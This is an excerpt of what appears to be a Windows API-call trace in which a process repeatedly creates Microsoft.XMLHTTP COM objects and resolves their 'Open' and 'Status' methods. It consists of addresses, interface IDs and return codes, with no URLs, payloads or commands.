	[0297.677] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0297.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0297.678] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0297.679] SysStringLen (param_1=0x0) returned 0x0
	[0297.679] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0297.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0297.679] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72f0) returned 0x0
	[0297.679] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0297.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72a8) returned 0x0
	[0297.679] ??2@YAPEAX_K@Z () returned 0x62f310
	[0297.679] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72a8, pUnkSite=0x62f310) 
	[0297.679] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0297.679] XMLHTTPRequest:IUnknown:Release (This=0x49c72a8) returned 0x0
	[0297.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72f0) returned 0x0
	[0297.679] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72f0) returned 0x3
	[0297.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0297.680] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0297.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0297.682] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0297.682] SysStringLen (param_1=0x0) returned 0x0
	[0297.682] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0297.683] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0297.683] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0297.683] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0297.683] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0297.683] ??2@YAPEAX_K@Z () returned 0x62f330
	[0297.683] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0297.683] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0297.683] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0297.683] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0297.683] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0297.683] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0297.683] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0297.683] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0297.683] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0297.684] SysStringLen (param_1=0x0) returned 0x0
	[0297.684] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0297.684] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0297.684] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7260) returned 0x0
	[0297.684] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0297.684] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0297.684] ??2@YAPEAX_K@Z () returned 0x62f310
	[0297.684] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0297.684] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0297.684] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0297.684] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7260) returned 0x0
	[0297.684] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7260) returned 0x3
	[0297.684] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0297.684] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0297.684] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0297.684] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0297.685] SysStringLen (param_1=0x0) returned 0x0
	[0297.685] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0297.685] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0297.685] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c40) returned 0x0
	[0297.685] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0297.685] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0297.685] ??2@YAPEAX_K@Z () returned 0x62f330
	[0297.685] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0297.685] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0297.685] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0297.685] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c40) returned 0x0
	[0297.685] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c40) returned 0x3
	[0297.685] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0297.685] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0297.685] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0297.685] longjmp () 
	[0297.686] longjmp () 
	[0297.686] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0297.686] SysStringLen (param_1=0x0) returned 0x0
	[0297.686] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0297.686] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0297.686] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0297.686] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0297.686] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0297.686] ??2@YAPEAX_K@Z () returned 0x62f310
	[0297.686] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0297.686] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0297.686] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0297.686] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0297.686] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0297.686] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0297.686] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0297.686] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0297.687] longjmp () 
	[0297.687] longjmp () 
	[0297.687] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0297.687] SysStringLen (param_1=0x0) returned 0x0
	[0297.687] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0297.687] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0297.687] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0297.687] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0297.687] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0297.687] ??2@YAPEAX_K@Z () returned 0x62f330
	[0297.687] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0297.687] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0297.687] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0297.687] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0297.687] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0297.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0297.688] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0297.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0297.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
